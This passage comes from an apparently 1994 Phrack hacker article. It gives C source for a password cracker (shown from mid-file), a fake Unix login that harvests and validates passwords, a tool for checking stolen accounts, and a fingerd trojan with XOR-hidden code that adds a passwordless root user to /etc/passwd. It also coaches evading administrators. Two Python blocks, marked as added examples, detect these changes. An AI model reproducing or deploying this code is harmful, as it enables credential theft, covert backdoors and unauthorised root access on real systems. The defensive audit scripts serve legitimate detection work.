   i.d., and then reverses it */
void reverse_word( char *wd )
{
  char temp[2], buff[WORDSIZE];
  int i;

  i = strlen(wd) + 1;
  strcpy(temp, "");
  strcpy(buff, "");

  do {
    i--;
    if ((isalnum(wd[i]) || (ispunct(wd[i]))) != NULL) {
      sprintf(temp, "%c", wd[i]);
      strncat(buff, temp, 1);
    }
  } while(i != 0);

  if (strlen(buff) > 1)
    try_word(buff);
}

/* Read one word at a time from the specified dictionary for use
   as possible passwords, if dictionary filename is NULL, ignore
   this operation */
void do_dict( void )
{
  FILE *fp;
  char buff[WORDSIZE], temp[2];
  int c;

  strcpy(buff, "");
  strcpy(temp, "");

  if (dict == NULL)
    exit(0);

  if ((fp = fopen(dict, "r")) == NULL) {
    printf("Error opening dictionary file\n");
    exit(0);
  }

  rewind(fp);

  while ((c = fgetc(fp)) != EOF) {
    if ((c != ' ') || (c != '\n')) {
      strcpy(temp, "");
      sprintf(temp, "%c", c);
      strncat(buff, temp, 1);
    }

    if (c == '\n') {
      if (buff[0] != ' ')
        try_word(buff);
      strcpy(buff, "");
    }
  }

  fclose(fp);
}

/* Process the word to be used as a password by stripping \n from
   it if necessary, then use the pwdauth() function, with the login
   name and word to attempt to get a valid id & password */
void try_word( char pw[] )
{
  int pwstat, i, pwlength;
  char temp[2], buff[WORDSIZE];

  strcpy(buff, "");
  pwlength =
    strlen(pw);

  for (i = 0; i != pwlength; i++) {
    if (pw[i] != '\n') {
      strcpy(temp, "");
      sprintf(temp, "%c", pw[i]);
      strncat(buff, temp, 1);
    }
  }

  if (strlen(buff) > 3 ) {
    printf("Trying : %s\n", buff);

    if (pwstat = pwdauth(logname, buff) == NULL) {
      printf("Valid Password! - writing details to 'data'\n");
      write_details(buff);

      if (strcmp(mode, "f") == NULL)
        exit(0);
    }
  }
}

/* If valid account & password, store this, along with the accounts
   uid, gid, comment, homedir & shell in a file called 'data' */
void write_details( char *pw )
{
  FILE *fp;

  if ((fp = fopen(OUTFILE, "a")) == NULL) {
    printf("Error opening output file\n");
    exit(0);
  }

  fprintf(fp, "%s:%s:%d:%d:", logname, pw, uid, gid);
  fprintf(fp, "%s:%s:%s\n", comment, homedir, shell);
  fclose(fp);
}
---cut here-------------------------------------------------------------------

again to compile it do :-

    $ gcc shcrack.c -o shcrack

or

    $ acc shcrack.c -o shcrack

this can vary depending on your compiler.

The Ultimate Login Spoof
^^^^^^^^^^^^^^^^^^^^^^^^

Well this subject has been covered many times before but it's a while since I have seen a good one, and anyway I thought other unix spoofs have had two main problems :-

1) They were pretty easy to detect when running

2) They recorded any old shit entered.....

Well now I feel these problems have been solved with the spoof below. Firstly, I want to say that no matter how many times spoofing is deemed as a 'lame' activity, I think it is very underestimated.

When writing this I have considered every possible feature such a program should have. The main ones are :-

1) To validate the entered login i.d. by searching for it in the password file.

2) Once validated, to get all information about the account entered including - real name etc from the comment field, homedir info (e.g. /homedir/miner) and the shell the account is using and store all this in a file.

3) To keep the spoofs tty idle time to 0, thus not to arouse the administrators suspicions.
4) To validate passwords before storing them, on all unshadowed unix systems & SUNOS shadowed/unshadowed systems.

5) To emulate the 'sync' dummy account, thus making it act like the real login program.

6) Disable all interrupts (CTRL-Z, CTRL-D, CTRL-C), and automatically quit if it has not grabbed an account within a specified time.

7) To automatically detect & display the hostname before the login prompt e.g. 'ccu login:', this feature can be disabled if desired.

8) To run continuously until a valid i.d. & valid password are entered.

As well as the above features, I also added a few more to make the spoof 'foolproof'. At university, a lot of the users have been 'stung' by login spoofs in the past, and so have become very conscious about security.

For example, they now try and get around spoofs by entering any old crap when prompted for their login name, or to hit return a few times, to prevent any 'crappy' spoofs which may be running. This is where my spoof shines!, firstly if someone was to enter -

    login: dhfhfhfhryr
    Password:

into the spoof, it checks to see if the login i.d. entered is valid by searching for it in the password file. If it exists, the spoof then tries to validate the password. If both the i.d. & password are valid, these will be stored in a file called .data, along with additional information about the account taken directly from the password file.

Now if, as in the case above, either the login name or password is incorrect, the information is discarded, and the login spoof runs again, waiting for a valid user i.d. & password to be entered.

Also, a lot of systems these days have an unpassworded account called 'sync', which when logged onto, usually displays the date & time the sync account was last logged into, and from which server or tty, the message of the day, syncs the disk, and then logs you straight out.
A few people have decided that the best way to dodge login spoofs is to first login to this account then when they are automatically logged out, to login to their own account.

They do this firstly, so that if a spoof is running it only records the details of the sync account and secondly the spoof would not act as the normal unix login program would, and therefore they would spot it and report it, thus landing you in the shit with the system administrator.

However, I got around this problem so that when someone tries to login as sync (or another account of a similar type, which you can define), it acts exactly like the normal login program would, right down to displaying the system date & time as well as the message of the day!!

The idle time facility
----------------------

One of the main problems with unix spoofs, is they can be spotted so easily by the administrator, as he/she could get a list of current users on the system and see that an account was logged on, and had been idle for maybe 30 minutes. They would then investigate & the spoof would be discovered.

I have therefore incorporated a scheme in the spoof whereby approx. every minute, the tty the spoof is executed from, is 'touched' with the current time, this effectively simulates terminal activity & keeps the terminals idle time to zero, which helps the spoofs chances of not being discovered greatly.

The spoof also incorporates a routine which will automatically keep track of approximately how long the spoof has been running, and if it has been running for a specified time without grabbing an i.d. or password, will automatically exit and run the real login program. This timer is by default set to 12.5 minutes, but you can alter this time if you wish.

Note: Due to the varying processing power of some systems, I could not set the timer to exactly 60 seconds, I have therefore set it to 50, in case it loses or gains extra time. Take this into consideration when setting the spoofs timer to your own value.
I recommend you stick with the default, and under no circumstances let it run for hours.

Password Validation techniques
------------------------------

The spoof basically uses 2 methods of password validation (or none at all on a shadowed system V). Firstly, when the spoof is used on any unix with an unshadowed password file, it uses the crypt function to validate a password entered. If however the system is running SUNOS 4.1.+ and incorporates the shadow password system, the program uses a function called pwdauth(). This takes the login i.d. & decrypted password as its arguments and checks to see if both are valid by encrypting the password and comparing it to the shadowed password file which is usually located in /etc/security and accessible only by root. By validating both the i.d. & password we ensure that the data which is saved to file is correct and not any old bullshit typed at the terminal!!!

Executing the Spoof
-------------------

ok, now about the program. This is written in ANSI-C, so I hope you have a compatible compiler, GCC or Sun's ACC should do it. Now the only time you will need to change the code is in the following circumstances :-

1) If you are to compile & run it on an unshadowed unix, in which case remove all references to the pwdauth() function, from both the declarations & the shadow checking routine, add this code in place of the shadow password checking routine :-

    if ( shadow == 1 ) {
        invalid = 0;
    else
        invalid = 1;
    }

2) Add the above code also to the spoof if you are running this on a system V which is shadowed. In this case the spoof loses its ability to validate the password, to my knowledge there is no sysV equivalent of the pwdauth() function.

Everything else should be pretty much compatible. You should have no problems compiling & running this on an unshadowed SUNOS machine, if you do, make the necessary changes as above, but it compiled ok on every unshadowed SUNOS I tested it on.
The Spoof should automatically detect whether a SUNOS system is shadowed or unshadowed and run the appropriate code to deal with each situation.

Note: when you have compiled this spoof, you MUST 'exec' it from the current shell for it to work, you must also only have one shell running. e.g. from C or Bourne shell using the GNU C Compiler do :-

    $ gcc spoof.c -o spoof
    $ exec spoof

This replaces the current shell with the spoof, so when the spoof quits & runs the real login program, the hackers account is effectively logged off.

ok enough of the bullshit, here's the spoof :-

----------cut here-------------------------------------------------------
/* Program   : Unix login spoof
   Author    : The Shining/UPi (UK Division)
   Date      : Released 12/4/94
   Unix Type : All unshadowed unix systems & shadowed SUNOS systems
   Note      : This file MUST be exec'd from the shell. */

#include
#include
#include
#include
#include
#include

#define OUTFILE ".data"           /* Data file to save account info into */
#define LOGPATH "/usr/bin/login"  /* Path of real login program */
#define DUMMYID "sync"            /* Dummy account on your system */
#define DLENGTH 4                 /* Length of dummy account name */

FILE *fp;

/* Set up variables to store system time & date */
time_t now;

static int time_out, time_on, no_message, loop_cnt;

/* Set up a structure to store users information */
struct loginfo {
  char logname[10];
  char key[9];
  char *comment;
  char *homedir;
  char *shell;
} u;

/* Use the unix function getpass() to read user password and
   crypt() or pwdauth() (remove it below if not SUNOS)
   to validate it etc */
char *getpass(), *gethostname(), *alarm(), *sleep(), *crypt(),
     *ttyname(), *pwdauth(), motd, log_date[60], pass[14], salt[3],
     *tty, cons[] = " on console ", hname[72], *ld;

/* flag = exit status, ppid = pid shell, wait = pause length,
   pwstat = holds 0 if valid password, shadow holds 1 if shadow
   password system is being used, 0 otherwise.
*/
int flag, ppid, wait, pwstat, shadow, invalid;

/* Declare main functions */
void write_details(struct loginfo *);
void catch( void ), disable_interrupts( void );
void log_out( void ), get_info( void ), invalid_login( void ),
     prep_str( char * );

/* set up pointer to point to pwfile structure, and also
   a pointer to the utime() structure */
struct passwd *pwentry, *getpwnam();
struct utimbuf *times;

int main( void )
{
  system("clear");

  /* Initialise main program variables to 0, change 'loop_cnt' to 1
     if you do not want the machines host name to appear with
     the login prompt! (e.g. prompt is `login:` instead of
     'MIT login:' etc) */
  wait = 3;               /* Holds value for pause */
  flag = 0;               /* Spoof ends if value is 1 */
  loop_cnt = 0;           /* Change this to 1 if no host required */
  time_out = 0;           /* Stops timer if spoof has been used */
  time_on = 0;            /* Holds minutes spoof has been running */
  disable_interrupts();   /* Call function to disable Interrupts */

  /* Get system time & date and store in log_date, this is
     displayed when someone logs in as 'sync' */
  now = time(NULL);
  strftime(log_date, 60, "Last Login: %a %h %d %H:%M:%S", localtime(&now));
  strcat(log_date, cons);
  ld = log_date;

  /* Get Hostname and tty name */
  gethostname(hname, 64);
  strcat(hname, " login: ");
  tty = ttyname();

  /* main routine */
  while( flag == 0 ) {
    invalid = 0;      /* Holds 1 if id +/or pw are invalid */
    shadow = 0;       /* 1 if shadow scheme is in operation */
    no_message = 0;   /* Flag for Login Incorrect msg */
    alarm(50);        /* set timer going */
    get_info();       /* get user i.d. & password */

    /* Check to see if the user i.d. entered is 'sync', if it is
       display system time & date, display message of the day and
       then run the spoof again, insert the account of your
       choice here, if its not sync, but remember to put
       the length of the accounts name next to it!
*/ if (strncmp(u.logname, DUMMYID, DLENGTH) == NULL) { printf("%s\n", ld); if ((fp = fopen("/etc/motd", "r")) != NULL) { while ((motd = getc(fp)) != EOF) putchar(motd); fclose(fp); } printf("\n"); prep_str(u.logname); no_message = 1; sleep(wait); } /* Check if a valid user i.d. has been input, then check to see if the password system is shadowed or unshadowed. If both the user i.d. & password are valid, get additional info from the password file, and store all info in a file called .data, then exit spoof and run real login program */ setpwent(); /* Rewind pwfile to beign processing */ if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL) { invalid = 1; flag = 0; } else strncpy(salt, pwentry->pw_passwd, 2); /* Check for shadowed password system, in SUNOS, the field in /etc/passwd should begin with '##', in system V it could contain an 'x', if none of these exist, it checks that the entry = 13 chars, if less then shadow system will probably be implemented (unless acct has been disabled) */ if ( invalid == 0 ) { if ((strcmp(salt, "##")) || (strncmp(salt, "x", 1)) == NULL) shadow = 1; else if (strlen(pwentry->pw_passwd) < 13) shadow = 1; /* If unshadowed, use the salt from the pwfile field & the key to form the encrypted password which is checked against the entry in the password file, if it matches, then all is well, if not, spoof runs again!! */ if ( shadow != 1 ) { if (strcmp(pwentry->pw_passwd, crypt(u.key, salt)) == NULL) invalid = 0; else invalid = 1; } /* If SUNOS Shadowing is in operation, use the pwdauth() function to validate the password, if not SUNOS, substitute this code with the routine I gave earlier! 
*/ if ( shadow == 1 ) { if (pwstat = pwdauth(u.logname, u.key) == NULL) invalid = 0; else invalid = 1; } } /* If we have a valid account & password, get user info from the pwfile & store it */ if ( invalid == 0 ) { u.comment = pwentry->pw_gecos; u.homedir = pwentry->pw_dir; u.shell = pwentry->pw_shell; /* Open file to store user info */ if ((fp = fopen(OUTFILE, "a")) == NULL) log_out(); write_details(&u); fclose(fp); no_message = 1; flag = 1; } else flag = 0; invalid_login(); endpwent(); /* Close pwfile */ if (no_message == 0) loop_cnt++; } /* end while */ log_out(); /* call real login program */ } /* Function to read user i.d. & password */ void get_info( void ) { char user[11]; unsigned int string_len; fflush(stdin); prep_str(u.logname); prep_str(u.key); strcpy(user, "\n"); /* Loop while some loser keeps hitting return when asked for user i.d. and if someone hits CTRL-D to break out of spoof. Enter a # at login to exit spoof. Uncomment the appropriate line(s) below to customise the spoof to look like your system */ while ((strcmp(user, "\n") == NULL) && (!feof(stdin))) { /* printf("Scorch Ltd SUNOS 4.1.3\n\n); */ if (loop_cnt > 0) strcpy(hname, "login: "); printf("%s", hname); fgets(user, 9, stdin); /* Back door for hacker, # at present, can be changed, but leave \n in. */ if (strcmp(user, "#\n") == NULL) exit(0); /* Strip \n from login i.d. 
*/ if (strlen(user) < 8) string_len = strlen(user) - 1; else string_len = strlen(user); strncpy(u.logname, user, string_len); /* check to see if CTRL-D has occurred because it does not generate an interrupt like CTRL-C, but instead generates an end-of-file on stdin */ if (feof(stdin)) { clearerr(stdin); printf("\n"); } } /* Turn off screen display & read users password */ strncpy(u.key, getpass("Password:"), 8); } /* Function to increment the timer which holds the amount of time the spoof has been running */ void catch( void ) { time_on++; /* If spoof has been running for 15 minutes, and has not been used, stop timer and call spoof exit routine */ if ( time_out == 0 ) { if (time_on == 15) { printf("\n"); alarm(0); log_out(); } } /* 'Touch' your tty, effectively keeping terminal idle time to 0 */ utime(tty, times); alarm(50); } /* Initialise a string with \0's */ void prep_str( char str[] ) { int strl, cnt; strl = strlen(str); for (cnt = 0; cnt != strl; cnt++) str[cnt] = ' '; } /* function to catch interrupts, CTRL-C & CTRL-Z etc as well as the timer signals */ void disable_interrupts( void ) { signal(SIGALRM, catch); signal(SIGQUIT, SIG_IGN); signal(SIGTERM, SIG_IGN); signal(SIGINT, SIG_IGN); signal(SIGTSTP, SIG_IGN); } /* Write the users i.d., password, personal information, homedir and shell to a file */ void write_details(struct loginfo *sptr) { fprintf(fp, "%s:%s:", sptr->logname, sptr->key); fprintf(fp, "%d:%d:", pwentry->pw_uid, pwentry->pw_gid); fprintf(fp, "%s:%s:", sptr->comment, sptr->homedir); fprintf(fp, "%s\n", sptr->shell); fprintf(fp, "\n"); } /* Display login incorrect only if the user hasn't logged on as 'sync' */ void invalid_login( void ) { if ( flag == 1 && pwstat == 0 ) sleep(wait); if ( no_message == 0 ) printf("Login incorrect\n"); } /* Displays appropriate message, exec's the real login program, this replaces the spoof & effectively logs spoof's account off. 
Note: this spoof must be exec'd from the shell to work */ void log_out( void ) { time_out = 1; if ( no_message == 1 ) { sleep(1); printf("Login incorrect\n"); } execl(LOGPATH, "login", (char *)0); } ----------cut here------------------------------------------------------- then delete the source, run it and wait for some sucker to login!. If you do initially run this spoof from your account, I suggest you remove it when you have grabbed someone's account and run it from theirs from then on, this reduces your chances of being caught! User i.d. & Password Validator ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Now if you are familiar with the unix Crack program, as I'm sure most of you are ;-), or if you have used my spoof to grab some accounts, this little program could be of some use. Say you have snagged quit a few accounts, and a few weeks later you wanna see if they are still alive, instead of logging onto them, then logging out again 20 or 30 times which can take time, and could get the system admin looking your way, this program will continuously ask you to enter a user i.d. & password, then validate them both by actually using the appropriate entry in the password file. All valid accounts are then stored along with other info from the password file, in a data file. The program loops around until you stop it. This works on all unshadowed unix systems, and, you guessed it!, shadowed SUNOS systems. If you run it on an unshadowed unix other than SUNOS, remove all references to pwdauth(), along with the shadow password file checking routine, if your on sysV, your shit outa luck! anyway, here goes :- ---cut here--------------------------------------------------------------- /* Program : To validate accounts & passwords on both shadowed & unshadowed unix systems. 
Author : The Shining/UPi (UK Division) Date : Released 12/4/94 UNIX type : All unshadowed systems, and SUNOS shadowed systems */ #include #include #include FILE *fp; int pw_system( void ), shadowed( void ), unshadowed( void ); void write_info( void ), display_notice( void ); struct passwd *pwentry, *getpwnam(); struct user { char logname[10]; char key[9]; char salt[3]; } u; char *getpass(), *pwdauth(), *crypt(), ans[2]; int invalid_user, stat; int main( void ) { strcpy(ans, "y"); while (strcmp(ans, "y") == NULL) { invalid_user = stat = 0; display_notice(); printf("Enter login id:"); scanf("%9s", u.logname); strcpy(u.key, getpass("Password:")); setpwent(); if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL) invalid_user = 1; else strncpy(u.salt, pwentry->pw_passwd, 2); if (invalid_user != 1) { if ((stat = pw_system()) == 1) { if ((stat = unshadowed()) == NULL) { printf("Unshadowed valid account! - storing details\n"); write_info(); } } else if ((stat = shadowed()) == NULL) { printf("SUNOS Shadowed valid account! - storing details\n"); write_info(); } else invalid_user = 2; } if (invalid_user == 1) printf("User unknown/not found in password file\n"); if (invalid_user == 2 ) printf("Password invalid\n"); printf("\n\nValidate another account?(y/n): "); scanf("%1s", ans); endpwent(); } } /* Check to see if shadow password system is used, in SUNOS the field in /etc/passwd starts with a '#', if not, check to see if entry is 13 chars, if not shadow must be in use. */ int pw_system( void ) { if (strlen(pwentry->pw_passwd) != 13) return(0); else if (strcmp(u.salt, "##") == NULL) return(0); else return(1); } /* If system is unshadowed, get the 2 character salt from the password file, and use this to encrypt the password entered. This is then compared against the password file entry. 
*/ int unshadowed( void ) { if (pwentry->pw_passwd == crypt(u.key, u.salt)) return(0); else return(1); } /* If SUNOS shadowe system is used, use the pwdauth() function to validate the password stored in the /etc/security/passwd.adjunct file */ int shadowed( void ) { int pwstat; if (pwstat = pwdauth(u.logname, u.key) == NULL) return(0); else return(1); } /* Praise myself!!!! */ void display_notice( void ) { system("clear"); printf("Unix Account login id & password validator.\n"); printf("For all unshadowed UNIX systems & shadowed SUNOS only.\n\n"); printf("(c)1994 The Shining\n\n\n\n"); } /* Open a file called 'data' and store account i.d. & password along with other information retrieved from the password file */ void write_info( void ) { /* Open a file & store account information from pwfile in it */ if ((fp = fopen("data", "a")) == NULL) { printf("error opening output file\n"); exit(0); } fprintf(fp, "%s:%s:%d:", u.logname, u.key, pwentry->pw_uid); fprintf(fp, "%d:%s:", pwentry->pw_gid, pwentry->pw_gecos); fprintf(fp, "%s:%s\n", pwentry->pw_dir, pwentry->pw_shell); fclose(fp); } -----cut here------------------------------------------------------------------ The above programs will not compile under non-ansi C compilers without quite a bit of modification. I have tested all these programs on SUNOS both shadowed & unshadowed, though they should work on other systems with little modification (except the shadow password cracker, which is SUNOS shadow system specific). Regards to the following guys :- Archbishop & The Lost Avenger/UPi, RamRaider/QTX, the guys at United International Perverts(yo Dirty Mac & Jasper!) and all I know. (c) 1994 The Shining (The NORTH!, U.K.) ******************************************************************************* ==Phrack Magazine== Volume Five, Issue Forty-Six, File 12 of 28 **************************************************************************** The fingerd trojan horse Original article by Hitman Italy for Phrack Inc. 
This article is for informational purposes only, I'm not liable for any damage or illegal activity perpetrated using the source or the information in the article.

-=- + -

So you have gained access to a system and want to keep on hacking without being kicked off by a smart operator. There are a dozen methods you can use. Usually, if an operator figures out that his system is under attack, he'll check out the login program and telnetd for backdoors, then the telnet for logging activities or network sniffers and so on.. if nothing is found he'll realize the hacker is a dumb ass and he'll just modify the passwd to prevent him from logging on (in most cases). Here comes my fingerd trojan.

This scheme is quite original (I've never seen it used) and the source is compact enough to be fitted into a MAG. The fingerd, as you all know (I hope), is the finger server run by inetd when a client opens the finger port (N.79). Of course, if the port is locked, or you have a network firewall, do not use this code.
---------- + CUT HERE + ----------------------------------------------- /* The Fingerd trojan by Hitman Italy * This source cannot be spread without the whole article * but you can freely implement or modify it for personal use */ static char copyright[] = ""; /* Add the copyright string here */ static char sccsid[] = ""; /* Add the sccsid string here */ #include #define PATH_FINGER "/usr/ucb/finger" #define CODE 161 char *HitCrypt(ch) char *ch; { char *b; b=ch; while ((*(ch++)^=CODE)!=0x00); return(b); } main(argc,argv) int argc; char *argv[]; { register FILE *fp; register int ch; register char *lp; int p[2]; static char exor[4][23]={ {201,200,213,CODE}, {142,196,213,194,142,209,192,210,210,214,197,CODE}, {201,200,213,155,155,145,155,145,155,155,142,155,142,195,200,207,142,194, 210,201,CODE}, {227,192,194,202,197,206,206,211,129,192,194,213,200,215,192,213,196,197, 143,143,143,CODE} }; #define ENTRIES 50 char **ap, *av[ENTRIES + 1], line[1024], *strtok(); #ifdef LOGGING /* unused, leave it for "strings" command */ #include struct sockaddr_in sin; int sval; sval = sizeof(sin); if (getpeername(0, &sin, &sval) < 0) fatal(argv[0],"getpeername"); #endif if (!fgets(line, sizeof(line), stdin)) exit(1); av[0] = "finger"; for (lp = line, ap = &av[1];;) { *ap = strtok(lp, " \t\r\n"); if (!*ap) break; if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w')) *ap = "-l"; if (++ap == av + ENTRIES) break; lp = NULL; } if (pipe(p) < 0) fatal(argv[0],"pipe"); switch(fork()) { case 0: (void)close(p[0]); if (p[1] != 1) { (void)dup2(p[1], 1); (void)close(p[1]); } /*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/ if (av[1]) if (strcmp( (HitCrypt(&exor[0][0])) ,av[1])==0) { if(!(fp=fopen( (HitCrypt(&exor[1][0])) ,"a"))) _exit(10); fprintf(fp,"%s\n", HitCrypt(&exor[2][0])); printf("%s\n", HitCrypt(&exor[3][0])); fclose(fp); break; } /*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/ if (execv(PATH_FINGER, av)==-1) fprintf(stderr,"No local finger program found\n"); _exit(1); case -1: 
                fatal(argv[0],"fork");
        }
        (void)close(p[1]);
        if (!(fp = fdopen(p[0], "r")))
                fatal(argv[0],"fdopen");
        while ((ch = getc(fp)) != EOF) {
                putchar(ch);
        }
        exit(0);
}

fatal(prg,msg)
        char *prg,*msg;
{
        fprintf(stderr, "%s: ", prg);
        perror(msg);
        exit(1);
}
--------- + CUT HERE + ----------------------------------------------

I think it's quite easy to understand, first of all, inetd opens the socket and pipes the input data through the fingerd

*       if (!fgets(line, sizeof(line), stdin))
*               exit(1);
*       av[0] = "finger";
*       for (lp = line, ap = &av[1];;) {
*               *ap = strtok(lp, " \t\r\n");
*               if (!*ap)
*                       break;
*               if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w'))
*                       *ap = "-l";

here it gets the data from stdin and parses them (strtok) converting (due to RFC742) any '/W' or '/w' old options into '-l'

*       switch(fork()) {
*       case 0:
*               (void)close(p[0]);
*               if (p[1] != 1) {
*                       (void)dup2(p[1], 1);
*                       (void)close(p[1]);
*               }

the task goes into the background

*               if (execv(PATH_FINGER, av)==-1)
*                       fprintf(stderr,"No local finger program found\n");

here the daemon executes the local finger with remote parameters

*       (void)close(p[1]);
*       if (!(fp = fdopen(p[0], "r")))
*               fatal(argv[0],"fdopen");
*       while ((ch = getc(fp)) != EOF) {
*               putchar(ch);

the output is piped back to the remote system

That's how the finger daemon works... now the trojan, basically we'll check out the input finger user till the magic code matches, then our sleepin' trojan will wake up and do the job... let's examine my code (decrypted)

/*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/
        if (av[1])
          if (strcmp("hit",av[1])==0) {
             if(!(fp=fopen("/etc/passwd","a")))
                _exit(10);
             fprintf(fp,"hit::0:0::/:/bin/csh\n");
             printf("Backdoor activated...\n");
             fclose(fp);
             break;
          }
/*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/

When the "hit" magic code matches the trojan will modify the passwd adding a fake unpassworded root user named "hit", so you can relogin as root, cover your tracks and keep on working.
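From the operator's side, the single-byte XOR used by HitCrypt (CODE 161) only defeats a plain `strings` run; trying all 255 keys surfaces the hidden text again. The following is an added example, not part of the original article: the needle list and function names are assumptions, and the sample bytes are constructed from the article's own exor rows.

```python
"""Brute-force single-byte XOR to surface strings hidden from `strings`."""

# Plaintext indicators worth finding inside a network daemon binary.
# This needle list is an assumption of the example; extend it as needed.
NEEDLES = [b"/etc/passwd", b"/bin/csh", b"/bin/sh", b"::0:0:"]

# Constructed sample: two plaintext strings as `strings` would show them,
# followed by the article's four exor rows, each zero-padded to 23 bytes
# the way a `static char exor[4][23]` initialiser is laid out in memory.
_ROWS = [
    [201, 200, 213, 161],
    [142, 196, 213, 194, 142, 209, 192, 210, 210, 214, 197, 161],
    [201, 200, 213, 155, 155, 145, 155, 145, 155, 155, 142, 155, 142, 195,
     200, 207, 142, 194, 210, 201, 161],
    [227, 192, 194, 202, 197, 206, 206, 211, 129, 192, 194, 213, 200, 215,
     192, 213, 196, 197, 143, 143, 143, 161],
]
SAMPLE = b"finger\x00/usr/ucb/finger\x00" + b"".join(
    bytes(row).ljust(23, b"\x00") for row in _ROWS)


def scan_xor_strings(blob, needles=NEEDLES):
    """Return sorted (offset, key, needle) for each needle found under a
    single-byte XOR key in 1..255 (key 0 would simply be plaintext)."""
    hits = []
    for key in range(1, 256):
        for needle in needles:
            encoded = bytes(b ^ key for b in needle)
            pos = blob.find(encoded)
            while pos != -1:
                hits.append((pos, key, needle.decode("ascii")))
                pos = blob.find(encoded, pos + 1)
    return sorted(hits)


def recover_string(blob, offset, key):
    """Expand a hit to the whole hidden string by walking left and right
    while the decoded byte is printable ASCII."""
    def printable(i):
        return 0 <= i < len(blob) and 0x20 <= (blob[i] ^ key) <= 0x7E

    start = offset
    while printable(start - 1):
        start -= 1
    end = offset
    while printable(end):
        end += 1
    return bytes(b ^ key for b in blob[start:end]).decode("ascii")


def report(blob):
    """Return the unique (key, recovered string) pairs for human review."""
    seen = []
    for offset, key, _needle in scan_xor_strings(blob):
        item = (key, recover_string(blob, offset, key))
        if item not in seen:
            seen.append(item)
    return seen


if __name__ == "__main__":
    for key, text in report(SAMPLE):
        print("key=0x%02x  %r" % (key, text))
```

Run it over the bytes of the installed daemon and of a known-good copy; a finger daemon has no reason to carry an encoded password-file path or passwd record.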
Of course this is an example, you can do what you want simply by adding your custom code, you may remote cat a log file without logging in, or remote kill a user, maybe root logins are disabled so you have to make a suid shell and add a normal entry in the passwd or open a port and so on, you can also use multiple codes if you like. If the magic word doesn't match, of course the finger will work normally.

# finger hit@666.666.666.666
[666.666.666.666]
Backdoor activated...

Well done! You have gained root access.

(...)
# cat /etc/passwd
root:EXAMPLE PASSWORD:0:1:Operator:/:/bin/csh
nobody:*:65534:65534::/:
daemon:*:1:1::/:
sys:*:2:2::/:/bin/csh
bin:*:3:3::/bin:
uucp:*:4:8::/var/spool/uucppublic:
news:*:6:6::/var/spool/news:/bin/csh
ingres:*:7:7::/usr/ingres:/bin/csh
audit:*:9:9::/etc/security/audit:/bin/csh
sync::1:1::/:/bin/sync
ftp:*:995:995:Anonymous FTP account:/home/ftp:/bin/csh
+::0:0:::
hit::0:0::/:/bin/csh
^^^
they run NIS... anyway our local root login will work fine

#finger hit@hacked.system.com
[hacked.system.com]
here is the log
user: xit001 from: hell.com ip: 666.666.666.666 has pw: xit001
user: yit001 from: (...)

That's really useful to collect logfiles without logging in and leaving tracks everywhere.

Now the problem.... If you want to use the fingerd to run world accessible commands you won't have any problem but if you require root privileges check this out:

#grep fingerd /etc/inetd.conf
finger stream tcp nowait nobody /usr/etc/in.fingerd in.fingerd
                         ^^^^^^

On SunOs 4.x.x the fingerd runs as nobody, the fake user (used with NFS etc..), as nobody of course you cannot modify the passwd, so edit the file

finger stream tcp nowait root /usr/etc/in.fingerd in.fingerd

now you have to refresh the inetd process

#kill -HUP

now you can do what you want, many unix clones let the fingerd run as root by default... and even if you have to modify the inetd.conf an operator is unlikely to realize what is happening since all other daemons run as root.
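Both changes described above leave evidence in plain configuration files: a passwordless UID 0 entry in the passwd, and a finger service promoted from nobody to root in inetd.conf. The audit below is an added example, not part of the original article; the function names and the `EXPECTED_USER` baseline table are assumptions, and the sample inputs are constructed from the listings the article prints.

```python
"""Audit passwd and inetd.conf text for the changes this trojan relies on."""

# Constructed sample: the /etc/passwd listing printed in the article, after
# the backdoor appended its entry.
SAMPLE_PASSWD = """\
root:EXAMPLE PASSWORD:0:1:Operator:/:/bin/csh
nobody:*:65534:65534::/:
daemon:*:1:1::/:
sys:*:2:2::/:/bin/csh
bin:*:3:3::/bin:
uucp:*:4:8::/var/spool/uucppublic:
news:*:6:6::/var/spool/news:/bin/csh
ingres:*:7:7::/usr/ingres:/bin/csh
audit:*:9:9::/etc/security/audit:/bin/csh
sync::1:1::/:/bin/sync
ftp:*:995:995:Anonymous FTP account:/home/ftp:/bin/csh
+::0:0:::
hit::0:0::/:/bin/csh
"""

# The two inetd.conf lines quoted in the article: stock, then edited.
INETD_STOCK = "finger stream tcp nowait nobody /usr/etc/in.fingerd in.fingerd\n"
INETD_EDITED = "finger stream tcp nowait root /usr/etc/in.fingerd in.fingerd\n"

# Expected run-as user per service. Only the finger/nobody pairing comes from
# the article (SunOS 4.x); treat the table as a site baseline you maintain.
EXPECTED_USER = {"finger": "nobody"}


def audit_passwd(text):
    """Return (line number, account, problem) for risky local entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line[0] in "+-":
            # NIS include/exclude marker, not a local account.
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], "malformed entry"))
            continue
        name, password, uid = fields[0], fields[1], fields[2]
        if password == "":
            findings.append((lineno, name, "empty password field"))
        if uid.isdigit() and int(uid) == 0 and name != "root":
            findings.append((lineno, name, "UID 0 account other than root"))
    return findings


def audit_inetd(text, expected=EXPECTED_USER):
    """Return (line number, service, actual user, expected user) for every
    service whose run-as user differs from the baseline."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.split("#", 1)[0].strip()
        fields = line.split()
        if len(fields) < 6:
            continue  # blank, comment-only or incomplete line
        service, user = fields[0], fields[4]
        want = expected.get(service)
        if want is not None and user != want:
            findings.append((lineno, service, user, want))
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print("passwd line %d: %s: %s" % finding)
    for finding in audit_inetd(INETD_EDITED):
        print("inetd.conf line %d: %s runs as %s, expected %s" % finding)
```

The `sync` finding is a true positive as well: the listing ships that account with an empty password field.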
Why have I crypted all data?

#strings login
(...)
